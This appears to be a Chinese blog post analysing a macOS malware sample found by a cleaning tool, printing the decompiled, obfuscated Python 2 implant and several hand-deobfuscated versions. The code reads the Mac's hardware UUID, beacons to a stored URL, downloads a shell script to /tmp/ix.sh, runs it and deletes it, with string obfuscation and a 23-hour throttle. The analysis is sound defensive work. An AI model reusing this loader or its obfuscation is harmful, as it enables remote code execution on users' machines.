本人使用MacBooster 7 扫出了几个未知程序.

JMJ56 这个程序，在 Finder 中打开后发现是一个 shell 脚本，它调用了 python。

9NKb0 就是被调用的 python 脚本，只不过是编译之后的 pyc 二进制文件。

使用 https://tool.lu/pyc/ 在线反编译工具, 将其反编译后,得到了如下代码:

import zlib
import base64
# Stage-0 loader: a base64 blob is decoded, zlib-inflated and handed to
# Python 2's exec statement. The blob itself was stripped from this copy of
# the page; the author recovers the plaintext by replacing exec with print.
exec zlib.decompress(base64.b64decode('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'))

将exec 改成 print 后 得到源码:

# Stage-1 script as dumped by the decompiler. Every builtin, module function
# and constant is first bound to a random-looking alias; the author resolves
# them by hand in the passes further down the page.
import time
YCs=globals
YCQ=None
YCX=Exception
YCU=chr
YCf=ord
YCq=True
YCk=str
YCN=int
YCD=len
YCI=open
YCM=False
YCF=float
YCu=OSError
YCE=enumerate
Ycw=time.time
Ycb=time.sleep
import uuid
YcB=uuid.uuid4   # source of the per-run XOR key built in Ycx.__init__
import os
Yci=os.path
YcA=os.remove
Ycl=os.getenv
YCc=os.mkdir
import sys
YCp=sys.path
YCn=sys.argv
import platform
YCS=platform.mac_ver   # macOS version, sent as the mvr= query parameter
import urllib2
YCL=urllib2.Request
YCy=urllib2.urlopen   # the only network primitive the script uses
import shelve
YCV=shelve.DbfilenameShelf   # on-disk key/value state (beacon URL, timestamps)
import base64
YCg=base64.b64decode
# Apple's bundled PyObjC for the system Python 2.7; needed for the IOKit calls.
YCp.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
YCa=objc.loadBundleFunctions
from subprocess import Popen,PIPE
from Foundation import NSBundle
YCr=NSBundle.bundleWithIdentifier_
def YcP():
    # Loads three IOKit functions into this module's globals through PyObjC,
    # so YcK()/Yct() can read the machine's IOPlatformUUID for the beacon.
    YcC=YCr('com.apple.framework.IOKit')
    Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
    YCa(YcC,YCs(),Ycp)
def YcK(WTRkc):
    # Returns property WTRkc of the IOPlatformExpertDevice registry entry
    # (the IOKit symbols are the ones YcP() injected into globals).
    return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,YCQ,0)
def Yct():
    # Hardware UUID of the Mac; used as the id= value in the beacon URL
    # shown further down the page.
    return YcK("IOPlatformUUID")
def YcW(bmtzB):
    # Stub; not referenced anywhere else in this listing.
    pass
def YcH(YcF):
    # Plain HTTP GET via urllib2 (no timeout). Returns the response body, or
    # falls through to None on any exception — callers treat None as "no data".
    try:
        Ycn=YCL(YcF)
        YcS=YCy(Ycn)
        YcL=YcS.read()
        return YcL
    except YCX as twwAy:
        pass
def Ycz(mOoCz):
    # String-constant accessor. Ycy is set to True at module level before any
    # call, so in practice every constant goes through the YcT() decoder.
    if Ycy:
        return YcT(mOoCz)
    return mOoCz
def YcT(bmtzB):
    # Three-layer string decoder: base64-decode, shift every character down by
    # one code point, base64-decode, reverse, base64-decode again.
    return YCg(YCg("".join([YCU(YCf(x)-1)for x in YCg(bmtzB)]))[::-1])
Ycy=YCq   # True: Ycz() always decodes (see Ycz above)
class Ycx:
    # Main implant logic. All file names, shelve keys and constants are pulled
    # through Ycz() at construction time; the plaintext values quoted in the
    # comments below are the ones the author resolves in the third pass.
    def __init__(Ycq):
        # Ycq is `self` under an obfuscated name.
        YcP()
        YcV=Ycz("UVUyU1ZsNTZTV04+")   # resolves to 'HOME' (env var name)
        Ycg=Ycz("TkVselpvbDZiWE9wWGtPTg==")   # resolves to '/var/root'
        Yca=Ycz("UVUyU1hrS0hObVdwVm1pW1NVbVVbWW1IY1hPcWNGZVY=")   # default-mode state dir (resolved: Library/DataSave)
        Ycr=Ycz("UVdHSVtHU2xXM0d1T1VLalNGNllYVjU2VjNXNlNuMmtiWHlJV0I+Pg==")   # resolves to 'Library/MacConfigStd' ('cr' mode)
        Ycs=Ycz("TkVtSVhoPj4=")   # resolves to 'dot' (shelve db name, default mode)
        YcQ=Ycz("ZW1LSlhoPj4=")   # resolves to 'dto' (shelve db name, 'cr' mode)
        YcX=Ycz("UVZXVltCPj4=")   # resolves to 'u1' (file holding the beacon URL, default mode)
        YcU=Ycz("UVdtVltCPj4=")   # resolves to 'u6' (same, 'cr' mode)
        Ycf=Ycz("UVUyQ1pZcDJSM1d4UFZPa2VHSntVQj4+")   # resolves to '/tmp/ix.sh'
        Ycq.LyPiI=Ycz("UVZHWltCPj4=")   # resolves to 'up' (shelve key caching the beacon URL)
        Ycq.bHJIV=Ycz("UVUyQ1pZcDZiWEt4VGtLTg==")   # resolves to '/bin/sh'
        Ycq.RXatE=Ycz("UVhldVtSPj4=")   # resolves to 'zh' (first-run timestamp key)
        Ycq.jWCqZ=Ycz("UVhldltSPj4=")   # resolves to 'zx' (last-beacon timestamp key)
        Ycq.axruV=Ycz("UVZse1hSPj4=")   # resolves to 'cr' (argv[1] switch)
        Ycq.PzAcW=Ycz("ZldxWlpoPj4=")   # resolves to 'mvr' (query parameter carrying the macOS version)
        Yck=Ycz("UVZHRlVVU0tTRjk+")   # resolves to 82800 (seconds: 23 h beacon interval)
        Ycq.FlQzO=Ycz("UVUyU1VrR2tTRjE+")   # mkdir mode for the state dir (0755 in the author's pass)
        Ycq.TdttD=Ycz("UVUyNFtCPj4=")   # resolves to 'w' (open mode for /tmp/ix.sh)
        Ycq.skrNG=Ycz("UVhPRlVoPj4=")   # code point of the path separator used by YcO ('/')
        # Four hex characters of a fresh uuid4 become a per-run XOR key for
        # YcJ(); it only masks strings in memory, nothing on disk depends on it.
        Ycq.BnAQf=YCk(YcB()).split('-')[-1][2:6]
        YcN=Ycl(YcV)   # $HOME
        if YcN in[Ycg,YCQ]:
            # Unset HOME or HOME='/var/root' (running as root) gives an empty
            # prefix, so the state dir becomes /Library/... instead of ~/Library/...
            YcN=""
        if Ycq.YcG():
            Ycq.iQbym=Ycq.YcJ(Ycq.YcO(YcN,Ycr))   # state dir, XOR-masked
            YcD=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),YcQ))   # shelve db path, XOR-masked
            YcI=Ycq.YcJ(YcU)   # URL file name, XOR-masked
        else:
            Ycq.iQbym=Ycq.YcJ(Ycq.YcO(YcN,Yca))
            YcD=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),Ycs))
            YcI=Ycq.YcJ(YcX)
        Ycq.tJTBy=Ycq.YcJ(Ycf)   # '/tmp/ix.sh', XOR-masked
        Ycq.tvkWA=Ycq.YcJ(Ycq.YcO(Ycq.YcJ(Ycq.iQbym),Ycq.YcJ(YcI)))   # <state dir>/u1 or /u6, XOR-masked
        try:
            Ycq.CRAQs=YCV(Ycq.YcJ(YcD))   # open (or create) the shelve state db
        except YCX as twwAy:
            # CRAQs and axdjg stay unset; Ycm() then fails on the first
            # attribute access in Yce(), and that error is not caught.
            return
        Ycq.axdjg=YCN(Yck)
    def Ycm(Ycq):
        # Entry point: ensure the state dir, apply the 23 h throttle, beacon, close the db.
        Ycq.Yco()
        if Ycq.Yce():
            Ycq.Ych()
        Ycq.CRAQs.close()
    def Ych(Ycq):
        # Use the cached 'up' URL from the shelve db; otherwise read the first
        # line of the u1/u6 file in the state dir, cache it there and beacon to it.
        if YCD(Ycq.CRAQs.get(Ycq.LyPiI,''))>0:
            Ycq.YcR(Ycq.CRAQs[Ycq.LyPiI].strip())
        else:
            try:
                f=YCI(Ycq.YcJ(Ycq.tvkWA))
                YcM=f.readline()
                f.close()
                Ycq.CRAQs[Ycq.LyPiI]=YcM.strip()
                if YCD(Ycq.CRAQs.get(Ycq.LyPiI,''))>0:
                    Ycq.YcR(Ycq.CRAQs[Ycq.LyPiI].strip())
                else:
                    pass
            except YCX as twwAy:
                # No URL file → silently do nothing this run.
                return
    def YcR(Ycq,jfubJ):
        # Beacon: GET "<up><IOPlatformUUID>&mvr=<macOS version>" (the complete
        # URL is quoted further down the page). A body longer than 10 bytes is
        # treated as the URL of the next stage, not as the script itself.
        YcF="{}{}&{}={}".format(jfubJ,Yct(),Ycq.PzAcW,YCS()[0])
        YcL=YcH(YcF)
        if not YcL:
            return
        if YCD(YcL)>10:
            Ycq.Ycv(YcL)
    def Ycv(Ycq,ToLzn):
        # Download → execute → delete cycle for /tmp/ix.sh.
        Ycq.Ycj(ToLzn)
        Ycq.Ycd()
        try:
            Ycb(2)   # 2 s grace period before the script is removed
            YcA(Ycq.YcJ(Ycq.tJTBy))
        except YCX as twwAy:
            pass
    def Ycj(Ycq,ToLzn):
        # Fetch the next-stage URL and write the body to /tmp/ix.sh (mode 'w').
        # If the fetch returned None the write raises and is swallowed.
        YcL=YcH(ToLzn)
        try:
            f=YCI(Ycq.YcJ(Ycq.tJTBy),Ycz(Ycq.TdttD))
            f.write(YcL)
            f.close()
        except YCX as twwAy:
            pass
    def Ycd(Ycq):
        # Run the script via /bin/sh with all three stdio pipes captured and
        # wait for it; the output is discarded.
        p=Popen([Ycq.bHJIV,Ycq.YcJ(Ycq.tJTBy)],stdin=PIPE,stdout=PIPE,stderr=PIPE)
        p.communicate()
    def YcG(Ycq):
        # True when invoked as `<script> cr`: selects the MacConfigStd/dto/u6 set.
        if YCD(YCn)>1:
            if YCn[1]==Ycq.axruV:
                return YCq
        return YCM
    def Yce(Ycq):
        # Throttle. The first run stores 'zh' and 'zx' and allows a beacon;
        # later runs allow one only when at least axdjg seconds (82800 = 23 h)
        # have passed since 'zx', and then refresh 'zx'.
        if YCN(Ycq.CRAQs.get(Ycq.RXatE,0))==0:
            Ycq.CRAQs[Ycq.RXatE]=Ycw()
            Ycq.CRAQs[Ycq.jWCqZ]=Ycw()
            return YCq
        if YCN(Ycq.CRAQs.get(Ycq.jWCqZ,0))>0:
            if Ycw()-YCF(Ycq.CRAQs[Ycq.jWCqZ])<Ycq.axdjg:
                return YCM
        Ycq.CRAQs[Ycq.jWCqZ]=Ycw()
        return YCq
    def Yco(Ycq):
        # Create the state directory (mode FlQzO) if it does not exist; all errors ignored.
        if not Yci.isdir(Ycq.YcJ(Ycq.iQbym)):
            try:
                YCc(Ycq.YcJ(Ycq.iQbym),YCN(Ycq.FlQzO))
            except YCu as xQowg:
                pass
            except YCX as twwAy:
                pass
    def YcJ(Ycq,DngPJ):
        # Repeating-key XOR with the 4-character BnAQf key. Applying it twice
        # to the same string restores the original, which is how the masked
        # attributes set in __init__ are unmasked at each use.
        return ''.join([YCU(YCf(JeEmF)^YCf(Ycq.BnAQf[JAYHL%YCD(Ycq.BnAQf)]))for JAYHL,JeEmF in YCE(YCk(DngPJ))])
    def YcO(Ycq,*args):
        # Join args with chr(skrNG) — the separator resolves to '/' in the
        # author's pass (path_join); Ycz() is tried as a fallback decoder.
        Ycu=Ycq.skrNG
        try:
            Ycu=YCN(Ycu)
        except YCX as twwAy:
            Ycu=YCN(Ycz(Ycq.skrNG))
        return YCU(Ycu).join(args)
# Module-level execution: construct and run once per invocation (the write-up
# states the launcher runs this at every boot).
YcE=Ycx()
YcE.Ycm()

看到这样的代码,有点尴尬, 混淆过后的python真牛逼. 手动优化一番后:

import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64
# Apple's bundled PyObjC for the system Python 2.7; needed for the IOKit calls in YcP()/YcK().
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle
def YcP():
    # Load three IOKit functions into this module's globals through PyObjC.
    YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
    Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
    objc.loadBundleFunctions(YcC,globals(),Ycp)
def YcK(WTRkc):
    # Read property WTRkc of the IOPlatformExpertDevice registry entry.
    return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
    # Hardware UUID of the Mac; becomes the id= value of the beacon URL.
    return YcK("IOPlatformUUID")
def YcW(bmtzB):
    # Stub; not referenced anywhere else in this listing.
    pass
def YcH(YcF):
    # Plain HTTP GET via urllib2 (no timeout); returns the body, or None on any exception.
    try:
        Ycn=urllib2.Request(YcF)
        YcS=urllib2.urlopen(Ycn)
        YcL=YcS.read()
        return YcL
    except Exception as twwAy:
        pass
def Ycz(mOoCz):
    # The first pass gated this on a module flag that is always True, so every
    # string constant goes through YcT().
    if True:
        return YcT(mOoCz)
    return mOoCz
def YcT(bmtzB):
    # Three-layer string decoder: base64, shift each char down by one, base64, reverse, base64.
    return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1])
class Ycx:
    # Second pass: same implant with the builtin aliases resolved. The string
    # constants are still encoded here; the author spells them out in the next pass.
    def __init__(self):
        YcP()
        YcV=Ycz("UVUyU1ZsNTZTV04+")
        Ycg=Ycz("TkVselpvbDZiWE9wWGtPTg==")
        Yca=Ycz("UVUyU1hrS0hObVdwVm1pW1NVbVVbWW1IY1hPcWNGZVY=")
        Ycr=Ycz("UVdHSVtHU2xXM0d1T1VLalNGNllYVjU2VjNXNlNuMmtiWHlJV0I+Pg==")
        Ycs=Ycz("TkVtSVhoPj4=")
        YcQ=Ycz("ZW1LSlhoPj4=")
        YcX=Ycz("UVZXVltCPj4=")
        YcU=Ycz("UVdtVltCPj4=")
        Ycf=Ycz("UVUyQ1pZcDJSM1d4UFZPa2VHSntVQj4+")
        self.LyPiI=Ycz("UVZHWltCPj4=")
        self.bHJIV=Ycz("UVUyQ1pZcDZiWEt4VGtLTg==")
        self.RXatE=Ycz("UVhldVtSPj4=")
        self.jWCqZ=Ycz("UVhldltSPj4=")
        self.axruV=Ycz("UVZse1hSPj4=")
        self.PzAcW=Ycz("ZldxWlpoPj4=")
        Yck=Ycz("UVZHRlVVU0tTRjk+")
        self.FlQzO=Ycz("UVUyU1VrR2tTRjE+")
        self.TdttD=Ycz("UVUyNFtCPj4=")
        self.skrNG=Ycz("UVhPRlVoPj4=")
        self.BnAQf=str(uuid.uuid4()).split('-')[-1][2:6]   # per-run XOR key for YcJ()
        YcN=os.getenv(YcV)   # $HOME; '/var/root' or unset collapses to ""
        if YcN in[Ycg,None]:
            YcN=""
        if self.YcG():
            # `<script> cr` mode uses a separate state dir / db / URL file.
            self.iQbym=self.YcJ(self.YcO(YcN,Ycr))
            YcD=self.YcJ(self.YcO(self.YcJ(self.iQbym),YcQ))
            YcI=self.YcJ(YcU)
        else:
            self.iQbym=self.YcJ(self.YcO(YcN,Yca))
            YcD=self.YcJ(self.YcO(self.YcJ(self.iQbym),Ycs))
            YcI=self.YcJ(YcX)
        self.tJTBy=self.YcJ(Ycf)   # path of the dropped script, XOR-masked
        self.tvkWA=self.YcJ(self.YcO(self.YcJ(self.iQbym),self.YcJ(YcI)))   # file holding the beacon URL, XOR-masked
        try:
            self.CRAQs=shelve.DbfilenameShelf(self.YcJ(YcD))   # persistent state db
        except Exception as twwAy:
            return
        self.axdjg=int(Yck)   # beacon interval in seconds
    def Ycm(self):
        # Entry point: ensure state dir, apply throttle, beacon, close db.
        self.Yco()
        if self.Yce():
            self.Ych()
        self.CRAQs.close()
    def Ych(self):
        # Beacon URL from the shelve cache, else from the first line of the URL file.
        if len(self.CRAQs.get(self.LyPiI,''))>0:
            self.YcR(self.CRAQs[self.LyPiI].strip())
        else:
            try:
                f=open(self.YcJ(self.tvkWA))
                YcM=f.readline()
                f.close()
                self.CRAQs[self.LyPiI]=YcM.strip()
                if len(self.CRAQs.get(self.LyPiI,''))>0:
                    self.YcR(self.CRAQs[self.LyPiI].strip())
                else:
                    pass
            except Exception as twwAy:
                return
    def YcR(self,jfubJ):
        # GET "<up><IOPlatformUUID>&mvr=<macOS version>"; a body longer than
        # 10 bytes is the URL of the next stage (fetched again in Ycj).
        YcF="{}{}&{}={}".format(jfubJ,Yct(),self.PzAcW,platform.mac_ver()[0])
        YcL=YcH(YcF)
        if not YcL:
            return
        if len(YcL)>10:
            self.Ycv(YcL)
    def Ycv(self,ToLzn):
        # Download → execute → delete cycle for the dropped script.
        self.Ycj(ToLzn)
        self.Ycd()
        try:
            time.sleep(2)
            os.remove(self.YcJ(self.tJTBy))
        except Exception as twwAy:
            pass
    def Ycj(self,ToLzn):
        # Fetch the next stage and write it to the script path (mode TdttD, 'w').
        YcL=YcH(ToLzn)
        try:
            f=open(self.YcJ(self.tJTBy),Ycz(self.TdttD))
            f.write(YcL)
            f.close()
        except Exception as twwAy:
            pass
    def Ycd(self):
        # Run the script through the shell (bHJIV) and wait; output is discarded.
        p=Popen([self.bHJIV,self.YcJ(self.tJTBy)],stdin=PIPE,stdout=PIPE,stderr=PIPE)
        p.communicate()
    def YcG(self):
        # True when argv[1] equals the 'cr' switch.
        if len(sys.argv)>1:
            if sys.argv[1]==self.axruV:
                return True
        return False
    def Yce(self):
        # Throttle: first run records both timestamps and beacons; later runs
        # beacon only when at least axdjg seconds have passed since jWCqZ.
        if int(self.CRAQs.get(self.RXatE,0))==0:
            self.CRAQs[self.RXatE]=time.time()
            self.CRAQs[self.jWCqZ]=time.time()
            return True
        if int(self.CRAQs.get(self.jWCqZ,0))>0:
            if time.time()-float(self.CRAQs[self.jWCqZ])<self.axdjg:
                return False
        self.CRAQs[self.jWCqZ]=time.time()
        return True
    def Yco(self):
        # Create the state dir (mode FlQzO) if missing; errors ignored.
        if not os.path.isdir(self.YcJ(self.iQbym)):
            try:
                os.mkdir(self.YcJ(self.iQbym),int(self.FlQzO))
            except OSError as xQowg:
                pass
            except Exception as twwAy:
                pass
    def YcJ(self,DngPJ):
        # Repeating-key XOR with BnAQf; applying it twice restores the input.
        return ''.join([chr(ord(JeEmF)^ord(self.BnAQf[JAYHL%len(self.BnAQf)]))for JAYHL,JeEmF in enumerate(str(DngPJ))])
    def YcO(self,*args):
        # Join args with chr(skrNG) ('/' once decoded); Ycz() is the fallback decoder.
        Ycu=self.skrNG
        try:
            Ycu=int(Ycu)
        except Exception as twwAy:
            Ycu=int(Ycz(self.skrNG))
        return chr(Ycu).join(args)
YcE=Ycx()
YcE.Ycm()

上面的代码稍微能看一些了。继续优化:

# -*- coding: utf-8 -*-
# @Time : 2019/8/4 8:13 PM
# @Author : dzq
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64
# Apple's bundled PyObjC for the system Python 2.7; needed for the IOKit calls in YcP()/YcK().
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle
def YcP():
    # Load three IOKit functions into this module's globals through PyObjC.
    YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
    Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
    objc.loadBundleFunctions(YcC,globals(),Ycp)
def YcK(WTRkc):
    # Read property WTRkc of the IOPlatformExpertDevice registry entry.
    return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
    # Hardware UUID of the Mac; becomes the id= value of the beacon URL.
    return YcK("IOPlatformUUID")
def YcW(bmtzB):
    # Stub; not referenced anywhere else in this listing.
    pass
def reqUrl(YcF):
    # Plain HTTP GET via urllib2 (no timeout); returns the body, or None on any exception.
    try:
        Ycn=urllib2.Request(YcF)
        YcS=urllib2.urlopen(Ycn)
        con=YcS.read()
        return con
    except Exception as twwAy:
        pass
def Ycz(mOoCz):
    # Kept from the obfuscated build but no longer called: every constant
    # below is now a literal.
    if True:
        return YcT(mOoCz)
    return mOoCz
def YcT(bmtzB):
    # Three-layer string decoder: base64, shift each char down by one, base64, reverse, base64.
    return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1])
class Ycx:
    # Third pass: encoded strings and the XOR masking replaced by plaintext.
    # The /Users/dengzhongqiang prefix is presumably the author's own $HOME
    # expanded on the analysis machine; the implant derives it from HOME.
    def __init__(self):
        YcP()
        YcV='HOME'
        Ycg='/var/root'
        Ycr='Library/MacConfigStd'
        Ycs='dot'
        YcX='u1'
        YcU='u6'
        Ycf='/tmp/ix.sh'
        self.bHJIV='/bin/sh'
        self.axruV='cr'
        self.PzAcW='mvr'
        self.TdttD='w'
        self.BnAQf='e2f4'   # sample XOR key; unused now that YcJ() is gone
        if self.YcG():
            # `<script> cr` mode: separate state dir, db and URL file.
            self.iQbym= '/Users/dengzhongqiang/Library/MacConfigStd'
            YcD= '/Users/dengzhongqiang/Library/MacConfigStd/dto'
            YcI= 'u6'
        else:
            self.iQbym= '/Users/dengzhongqiang/Library/DataSave'
            YcD= '/Users/dengzhongqiang/Library/DataSave/dot'
            YcI = 'u1'
        self.tvkWA=self.path_join(self.iQbym, YcI)   # file holding the beacon URL
        try:
            self.CRAQs=shelve.DbfilenameShelf(YcD)   # persistent state: 'up', 'zh', 'zx'
        except Exception as twwAy:
            return
    def Ycm(self):
        # Entry point: ensure the state dir, apply the 23 h throttle, beacon, close the db.
        self.Yco()
        if self.Yce():
            self.Ych()
        self.CRAQs.close()
    def Ych(self):
        # Beacon URL comes from the shelve key 'up', else from the first line of
        # the u1 file (hard-coded here to the default-mode path).
        if len(self.CRAQs.get('up',''))>0:
            self.req(self.CRAQs['up'].strip())
        else:
            try:
                f=open('/Users/dengzhongqiang/Library/DataSave/u1')
                line=f.readline()
                f.close()
                self.CRAQs['up']=line.strip()
                if len(self.CRAQs.get('up',''))>0:
                    self.req(self.CRAQs['up'].strip())
                else:
                    pass
            except Exception as twwAy:
                return
    def req(self,jfubJ):
        # GET "<up><IOPlatformUUID>&mvr=<macOS version>" (the full URL is quoted
        # further down the page); a body longer than 10 bytes is the URL of the
        # next stage, which Ycj fetches again.
        YcF="{}{}&{}={}".format(jfubJ,Yct(),'mvr',platform.mac_ver()[0])
        con=reqUrl(YcF)
        if not con:
            return
        if len(con)>10:
            self.Ycv(con)
    def Ycv(self,url):
        # Download → execute → delete cycle for /tmp/ix.sh.
        self.Ycj(url)
        self.Ycd()
        try:
            time.sleep(2)
            # NOTE(review): YcJ is not defined in this pass, so this raises
            # AttributeError (swallowed below) and the script is never removed;
            # the original build deletes /tmp/ix.sh at this point.
            os.remove(self.YcJ('/tmp/ix.sh'))
        except Exception as twwAy:
            pass
    def Ycj(self,url):
        # Fetch the next stage and write it to /tmp/ix.sh.
        con=reqUrl(url)
        try:
            f=open('/tmp/ix.sh',"w")
            f.write(con)
            f.close()
        except Exception as twwAy:
            pass
    def Ycd(self):
        # Run the script through the shell and wait; output is discarded.
        # NOTE(review): 'bib/sh' looks like a transcription typo — self.bHJIV
        # above is '/bin/sh'.
        p=Popen(['bib/sh','/tmp/ix.sh'],stdin=PIPE,stdout=PIPE,stderr=PIPE)
        p.communicate()
    def YcG(self):
        # True when invoked as `<script> cr`.
        if len(sys.argv)>1:
            if sys.argv[1]==self.axruV:
                return True
        return False
    def Yce(self):
        # Throttle: the first run records 'zh' and 'zx' and beacons; afterwards
        # only when at least 82800 s (23 h) have passed since 'zx'.
        if int(self.CRAQs.get('zh',0))==0:
            self.CRAQs['zh']=time.time()
            self.CRAQs['zx']=time.time()
            return True
        if int(self.CRAQs.get('zx',0))>0:
            if time.time()-float(self.CRAQs['zx'])< 82800:
                return False
        self.CRAQs['zx']=time.time()
        return True
    def Yco(self):
        # Create the state dir (0755) if missing. The isdir check is hard-coded
        # to the default-mode path while mkdir uses self.iQbym; the earlier
        # passes use self.iQbym for both.
        if not os.path.isdir('/Users/dengzhongqiang/Library/DataSave'):
            try:
                os.mkdir( self.iQbym,0755)
            except OSError as xQowg:
                pass
            except Exception as twwAy:
                pass
    def path_join(self,*args):
        # Replaces YcO(): the separator resolved to '/'.
        return '/'.join(args)
YcE=Ycx()
YcE.Ycm()
# -*- coding: utf-8 -*-
# @Time : 2019/8/4 8:13 PM
# @Author : dzq
import time
import uuid
import os
import sys
import platform
import urllib2
import shelve
import base64
# Apple's bundled PyObjC for the system Python 2.7; needed for the IOKit calls in YcP()/YcK().
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import objc
from subprocess import Popen,PIPE
from Foundation import NSBundle
def YcP():
    # Load three IOKit functions into this module's globals through PyObjC.
    YcC=NSBundle.bundleWithIdentifier_('com.apple.framework.IOKit')
    Ycp=[("IOServiceGetMatchingService",b"II@"),("IOServiceMatching",b"@*"),("IORegistryEntryCreateCFProperty",b"@I@@I"),]
    objc.loadBundleFunctions(YcC,globals(),Ycp)
def YcK(WTRkc):
    # Read property WTRkc of the IOPlatformExpertDevice registry entry.
    return IORegistryEntryCreateCFProperty(IOServiceGetMatchingService(0,IOServiceMatching("IOPlatformExpertDevice")),WTRkc,None,0)
def Yct():
    # Hardware UUID of the Mac; becomes the id= value of the beacon URL.
    return YcK("IOPlatformUUID")
def YcW(bmtzB):
    # Stub; not referenced anywhere else in this listing.
    pass
def reqUrl(YcF):
    # Plain HTTP GET via urllib2 (no timeout); returns the body, or None on any exception.
    try:
        Ycn=urllib2.Request(YcF)
        YcS=urllib2.urlopen(Ycn)
        con=YcS.read()
        return con
    except Exception as twwAy:
        pass
def Ycz(mOoCz):
    # Kept from the obfuscated build but no longer called.
    if True:
        return YcT(mOoCz)
    return mOoCz
def YcT(bmtzB):
    # Three-layer string decoder: base64, shift each char down by one, base64, reverse, base64.
    return base64.b64decode(base64.b64decode("".join([chr(ord(x)-1)for x in base64.b64decode(bmtzB)]))[::-1])
class Ycx:
    # Final pass: identical to the previous listing except that the unused
    # constants in __init__ are dropped and the 'cr' switch is inlined in YcG.
    # /Users/dengzhongqiang is presumably the author's own $HOME; the implant
    # derives the prefix from the HOME environment variable.
    def __init__(self):
        YcP()
        if self.YcG():
            # `<script> cr` mode: separate state dir, db and URL file.
            self.iQbym= '/Users/dengzhongqiang/Library/MacConfigStd'
            YcD= '/Users/dengzhongqiang/Library/MacConfigStd/dto'
            YcI= 'u6'
        else:
            self.iQbym= '/Users/dengzhongqiang/Library/DataSave'
            YcD= '/Users/dengzhongqiang/Library/DataSave/dot'
            YcI = 'u1'
        self.tvkWA=self.path_join(self.iQbym, YcI)   # file holding the beacon URL
        try:
            self.CRAQs=shelve.DbfilenameShelf(YcD)   # persistent state: 'up', 'zh', 'zx'
        except Exception as twwAy:
            return
    def Ycm(self):
        # Entry point: ensure the state dir, apply the 23 h throttle, beacon, close the db.
        self.Yco()
        if self.Yce():
            self.Ych()
        self.CRAQs.close()
    def Ych(self):
        # Beacon URL from the shelve key 'up', else from the first line of the
        # u1 file (hard-coded here to the default-mode path).
        if len(self.CRAQs.get('up',''))>0:
            self.req(self.CRAQs['up'].strip())
        else:
            try:
                f=open('/Users/dengzhongqiang/Library/DataSave/u1')
                line=f.readline()
                f.close()
                self.CRAQs['up']=line.strip()
                if len(self.CRAQs.get('up',''))>0:
                    self.req(self.CRAQs['up'].strip())
                else:
                    pass
            except Exception as twwAy:
                return
    def req(self,jfubJ):
        # GET "<up><IOPlatformUUID>&mvr=<macOS version>"; a body longer than
        # 10 bytes is the URL of the next stage, which Ycj fetches again.
        YcF="{}{}&{}={}".format(jfubJ,Yct(),'mvr',platform.mac_ver()[0])
        con=reqUrl(YcF)
        if not con:
            return
        if len(con)>10:
            self.Ycv(con)
    def Ycv(self,url):
        # Download → execute → delete cycle for /tmp/ix.sh.
        self.Ycj(url)
        self.Ycd()
        try:
            time.sleep(2)
            # NOTE(review): YcJ is not defined in this pass, so this raises
            # AttributeError (swallowed below) and the script is never removed;
            # the original build deletes /tmp/ix.sh at this point.
            os.remove(self.YcJ('/tmp/ix.sh'))
        except Exception as twwAy:
            pass
    def Ycj(self,url):
        # Fetch the next stage and write it to /tmp/ix.sh.
        con=reqUrl(url)
        try:
            f=open('/tmp/ix.sh',"w")
            f.write(con)
            f.close()
        except Exception as twwAy:
            pass
    def Ycd(self):
        # Run the script through the shell and wait; output is discarded.
        # NOTE(review): 'bib/sh' looks like a transcription typo — the decoded
        # interpreter path in the earlier passes is '/bin/sh'.
        p=Popen(['bib/sh','/tmp/ix.sh'],stdin=PIPE,stdout=PIPE,stderr=PIPE)
        p.communicate()
    def YcG(self):
        # True when invoked as `<script> cr`.
        if len(sys.argv)>1:
            if sys.argv[1]=='cr':
                return True
        return False
    def Yce(self):
        # Throttle: the first run records 'zh' and 'zx' and beacons; afterwards
        # only when at least 82800 s (23 h) have passed since 'zx'.
        if int(self.CRAQs.get('zh',0))==0:
            self.CRAQs['zh']=time.time()
            self.CRAQs['zx']=time.time()
            return True
        if int(self.CRAQs.get('zx',0))>0:
            if time.time()-float(self.CRAQs['zx'])< 82800:
                return False
        self.CRAQs['zx']=time.time()
        return True
    def Yco(self):
        # Create the state dir (0755) if missing. The isdir check is hard-coded
        # to the default-mode path while mkdir uses self.iQbym.
        if not os.path.isdir('/Users/dengzhongqiang/Library/DataSave'):
            try:
                os.mkdir( self.iQbym,0755)
            except OSError as xQowg:
                pass
            except Exception as twwAy:
                pass
    def path_join(self,*args):
        # Replaces YcO(): the separator resolved to '/'.
        return '/'.join(args)
YcE=Ycx()
YcE.Ycm()

通过调试和进一步优化，读懂这段逻辑后，知道了这段恶意程序的思路:

每次开机执行这段脚本，读取 dot.db，转换成 python 中的字典 data。[这里有一个时间比对：如果距上一次请求不到 23 个小时，则不请求 URL；这个 URL 的功能就是获取 ix.sh 文件的内容。]

